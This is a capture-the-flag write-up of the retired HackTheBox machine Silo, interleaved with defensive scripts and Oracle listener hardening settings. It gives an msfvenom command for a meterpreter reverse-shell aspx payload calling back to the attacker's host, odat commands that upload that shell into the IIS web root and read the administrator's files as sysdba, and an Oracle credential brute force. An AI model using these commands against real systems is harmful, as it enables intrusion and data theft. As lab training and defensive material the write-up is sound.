I attempted this retired machine without reading the HTB guides. I went through a lot of rabbit holes and eventually found that the Oracle TNS port, 1521, is the entry point.
While testing the Silo machine I found that it is susceptible to TNS poisoning. Searching the web I found this invaluable article, which describes the methodology for attacking an Oracle database through its TNS port (1521); the PDF slides can be found at https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
I followed the Oracle Metasploit guide and ran into rabbit holes. At first, while trying to use the Oracle SQLi modules, I encountered an oci8 error; after some research I found this, thanks to g0tmi1k's response in the forum. I then followed the instructions to the dot and got the modules working without error.
All the SQLi modules against Silo's Oracle failed to escalate the user to DBA. After research I found that I can use sqlplus to connect a user as sysdba, and further research led me to odat. I use the python3 script instead of the odat in the apt repository (I tried it, but it had errors).
odat is a powerful script that can execute commands, perform remote file inclusion and exfiltrate data from the remote Oracle server; in conclusion, everything from user to root can be done through the use of odat.
All in all, this machine is good practice for Oracle attacks, following the methodology introduced in https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
I am presenting the attack from enumeration through foothold to privilege escalation. Enumeration is very important in this machine; I only launch attacks when I am sure that there is a vulnerable target.
To make odat work properly
You need to follow the instructions in https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux to the dot; to make the environment variables permanent I suggest you put the path into your shell startup file.
Installing the files from Oracle will allow you to use the Metasploit Oracle SQLi modules, the sqlplus client and odat properly.
Do a git clone of https://github.com/quentinhardy/odat and use python3 to run the script. odat is available in Kali's repo, but you will run into errors on the Kali 2020 version (Linux kali 5.5.0-kali1-amd64 #1 SMP Debian 5.5.13-2kali1 (2020-04-03) x86_64 GNU/Linux).
The majority of the time I spent hacking this machine was on enumeration.
The nmap scan took time to finish, but ports were reported while it was still scanning, so I enumerated whenever I saw ports reported, without waiting for the entire nmap scan to finish.
My first enumeration was against the web, because tcp/80 was reported first by nmap, so I used tools such as dirbuster; the directory and file enumeration did not give me anything useful.
My next check was towards RPC and SMB, but both services denied access to an unauthenticated user.
The next enumeration became interesting after nmap reported tcp/1521 (the Oracle TNS port); my hunch told me that this could be the way to a foothold. This hunch developed after owning a few HTB Windows machines: most of them have web, DNS, WSMan, LDAP, SMB and RPC, but Silo was my first Windows machine with an Oracle database port, so this abnormality triggered my hunch to investigate the Oracle port.
nmap -sV -sC -p- -T4 -oN silo -vvv 10.10.10.82
# Nmap 7.80 scan initiated Thu May 7 13:12:19 2020 as: nmap -sV -sC -p- -T4 -oN silo -vvv 10.10.10.82
Increasing send delay for 10.10.10.82 from 0 to 5 due to 43 out of 107 dropped probes since last increase.
Warning: 10.10.10.82 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.82
Host is up, received syn-ack (0.18s latency).
Scanned at 2020-05-07 13:12:20 +08 for 3875s
Not shown: 63244 closed ports, 2278 filtered ports
Reason: 63244 conn-refused and 2278 no-responses
PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Microsoft IIS httpd 8.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   syn-ack Oracle TNS listener 220.127.116.11.0 (unauthorized)
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49160/tcp open  oracle-tns   syn-ack Oracle TNS listener (requires service name)
49161/tcp open  msrpc        syn-ack Microsoft Windows RPC
49162/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3m13s, deviation: 0s, median: 3m13s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 9149/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52707/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 38458/udp): CLEAN (Failed to receive data)
|   Check 4 (port 26445/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-07T06:20:02
|_  start_date: 2020-05-07T04:50:06

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 7 14:16:55 2020 -- 1 IP address (1 host up) scanned in 3876.32 seconds
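The "unusual port on a Windows box" hunch described above can be made repeatable. The following script is an added example for this write-up (not code from the post or from nmap): it parses nmap's normal (-oN) output, lists the open ports, and flags any service that falls outside a baseline of what a plain Windows member server is expected to expose. The baseline set is an assumption for the demonstration, and the embedded scan text is a constructed excerpt modelled on the Silo scan above.

```python
"""Triage an `nmap -oN` report: list open ports and flag services that are
unexpected for the host's OS family.

Added example for this write-up, not code from the post or from nmap. The set
of "expected" Windows services is an assumption for the demo; the scan text is
a constructed excerpt modelled on the Silo scan.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.82
Host is up, received syn-ack (0.18s latency).
PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Microsoft IIS httpd 8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   syn-ack Oracle TNS listener (unauthorized)
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49160/tcp open  oracle-tns   syn-ack Oracle TNS listener (requires service name)
49161/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
"""

# Assumed baseline: services a defender expects a plain Windows member server to expose.
EXPECTED_WINDOWS_SERVICES = {
    "http", "msrpc", "netbios-ssn", "microsoft-ds", "wsman", "ms-wbt-server",
}

# One nmap port line, e.g. "80/tcp open http syn-ack Microsoft IIS httpd 8.5"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"\s+(?P<reason>\S+)\s*(?P<version>.*)$"
)


@dataclass(frozen=True)
class OpenPort:
    port: int
    proto: str
    service: str
    version: str


def parse_open_ports(text: str) -> List[OpenPort]:
    """Extract every port nmap reports as open; NSE script output lines are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group("state") == "open":
            ports.append(OpenPort(int(m.group("port")), m.group("proto"),
                                  m.group("service"), m.group("version").strip()))
    return ports


def detect_os(text: str) -> Optional[str]:
    """Pull the OS family out of nmap's 'Service Info:' summary line, if present."""
    m = re.search(r"Service Info: OSs?: ([^;]+)", text)
    return m.group(1).strip() if m else None


def unusual_services(text: str) -> List[OpenPort]:
    """Open ports whose service name is outside the expected set for a Windows host."""
    os_name = detect_os(text) or ""
    if not os_name.lower().startswith("windows"):
        return []  # this demo only carries a baseline for Windows hosts
    return [p for p in parse_open_ports(text) if p.service not in EXPECTED_WINDOWS_SERVICES]


if __name__ == "__main__":
    for p in unusual_services(SAMPLE_NMAP_OUTPUT):
        print(f"unexpected on Windows host: {p.port}/{p.proto} {p.service} ({p.version})")
```

On the sample excerpt the two oracle-tns entries (1521 and 49160) are the only hits, which is exactly the anomaly the post acts on; in an inventory process the same output is what an asset owner would be asked to justify.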
I was using dirbuster at the same time to search for directories and files.
The original page is an IIS default page.
gobuster with the wordlist /usr/share/wordlists/dirb/big.txt gave me two directories.
dirbuster gave me three aspx files in /aspnet_client; they are "britney spears".aspx and "joe roehm".aspx, which are rabbit holes.
Oracle port enumeration
I researched tcp/1521 exploits on the web and found TNS poisoning.
A test with the tnspoison_checker module reveals that port 1521 is vulnerable to TNS poisoning.
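For the defender's side of this finding: the listener is flagged because it accepts instance registration from remote clients. The listener.ora fragment below is an added example, not from the post or from the Silo machine; the listener name LISTENER and the host name are assumptions. It shows the default listener definition next to the two settings Oracle provides to restrict who may register a service with the listener.

```ini
# listener.ora (added example; listener name "LISTENER" and host "silo" are assumed)

# Default shape: the listener accepts dynamic service registration from any
# client that can reach TCP 1521, which is what tnspoison_checker probes for.
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = silo)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))
    )
  )

# Hardening, 11.2.0.4 / 12c and later: only accept registration from local
# addresses. Values other than ON/OFF (for example a subnet) are documented by Oracle.
VALID_NODE_CHECKING_REGISTRATION_LISTENER = ON

# Hardening, older releases: restrict registration to the IPC endpoint so a
# remote TCP client cannot register an instance at all.
SECURE_REGISTER_LISTENER = (IPC)
```

After editing the file, `lsnrctl reload` applies the change without restarting the database; re-running tnspoison_checker afterwards is the quickest way to confirm the listener no longer accepts the remote registration.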
So what is the technique to exploit TNS poisoning? I found this article, which helped me attack the Oracle TNS port in a systematic way.
In short, to attack Oracle there are four things I need:
- the IP address of the Oracle server, which is known
- the Oracle listening port, which is known
- the username and password of an Oracle user, which are yet to be found
- the Service Identifier (SID) of Oracle, which is yet to be found
To find the username and password, I need the Oracle SID. I set the option that reports failed attempts to false, in order to suppress failure messages and display only successes.
Brute force username and password with the found SID
Follow this guide to the dot if you have the oci8 error.
I use the oracle_login module, set the SID to XE and run the brute force. This process takes a while, which may lead you to think the brute force has stalled; please wait patiently until the result is displayed.
The username and password are scott and tiger, both in lower case.
A foothold is found by using odat to perform remote file inclusion, remote command execution and remote file download.
Oracle privilege escalation
All the SQLi modules available to me in Metasploit failed to escalate scott to DBA.
After research I found that I can use sqlplus to test whether scott can be elevated, and further research led me to odat, which makes remote file inclusion, remote command execution and remote file download easy.
This is the command to test: sqlplus firstname.lastname@example.org:1521/XE as sysdba. If you get a SQL prompt, it means escalation to sysdba is available at any time.
Remote file inclusion with odat
dbmsxslprocessor is used for file upload.
To learn more about the options, run python3 ../tools/odat/odat.py dbmsxslprocessor --help; there is an option --putFile which is used to upload my shell.
To generate a shell aspx file:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.33 lport=1337 -f aspx -o hello.aspx
To upload the file:
python3 ../tools/odat/odat.py dbmsxslprocessor -s 10.10.10.82 -U scott -P tiger -d XE --putFile "c:\inetpub\wwwroot" "hello.aspx" "/home/cyruslab/htb/silo/hello.aspx" --sysdba
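The upload step above writes a new .aspx straight into the IIS web root, and IIS serves it as soon as it lands. The defender's counterpart is a hash baseline of the web root that is compared on a schedule or after every deployment, so that any script file appearing outside a deployment becomes a finding. The script below is an added example, not part of the post or of odat; the watched extension list is an assumption, and the demo builds a throw-away directory with constructed files rather than touching a real c:\inetpub\wwwroot.

```python
"""Baseline-and-diff integrity check for a web root.

Added example, not part of the original post or of odat. The watched extension
list is an assumption; demo() creates constructed files in a temporary directory.
On a real server, point it at the IIS web root and keep the baseline JSON somewhere
the web server's identity cannot write.
"""
import hashlib
import json
import sys
import tempfile
from pathlib import Path
from typing import Dict, List

# Executable or security-relevant web content worth tracking (assumed list).
WATCHED_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp", ".dll", ".config"}


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large DLLs do not land in memory at once."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Map each watched file (path relative to root, POSIX form) to its SHA-256."""
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in WATCHED_EXTENSIONS:
            baseline[p.relative_to(root).as_posix()] = hash_file(p)
    return baseline


def diff_baseline(old: Dict[str, str], new: Dict[str, str]) -> Dict[str, List[str]]:
    """Files added, removed or changed between two baselines."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(k for k in set(old) & set(new) if old[k] != new[k]),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: a clean web root, then an unexpected .aspx and a config edit."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "wwwroot"
        (root / "aspnet_client").mkdir(parents=True)
        (root / "iisstart.htm").write_text("<html>IIS</html>")  # static, not watched
        (root / "web.config").write_text("<configuration/>")
        (root / "aspnet_client" / "site.aspx").write_text("<%@ Page %>")
        before = build_baseline(root)

        # Simulated out-of-band changes (placeholder content, not a real page)
        (root / "hello.aspx").write_text("<%-- constructed placeholder --%>")
        (root / "web.config").write_text("<configuration><system.web/></configuration>")
        after = build_baseline(root)
        return diff_baseline(before, after)


if __name__ == "__main__":
    # Usage: webroot_check.py baseline <webroot> <baseline.json>
    #        webroot_check.py check    <webroot> <baseline.json>
    if len(sys.argv) == 4 and sys.argv[1] in ("baseline", "check"):
        root, store = Path(sys.argv[2]), Path(sys.argv[3])
        current = build_baseline(root)
        if sys.argv[1] == "baseline":
            store.write_text(json.dumps(current, indent=2))
        else:
            print(json.dumps(diff_baseline(json.loads(store.read_text()), current), indent=2))
    else:
        print(json.dumps(demo(), indent=2))
```

Run with no arguments to see the constructed scenario: the dropped hello.aspx shows up under "added" and the edited web.config under "modified". A non-empty "added" or "modified" list on a host that had no deployment is the alert condition; pairing it with the IIS access log for the same file name shows whether the new page has already been requested.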
Set up the multi handler:
Start the reverse connection:
Get the user flag
Get the root flag
odat has made getting the root flag really easy. To execute commands and download files, use the externaltable module; I tried dbmsxslprocessor to download the file but it failed.
python3 ../tools/odat/odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --getFile "c:\users\administrator\desktop" "root.txt" "/home/cyruslab/htb/silo/root.txt" --sysdba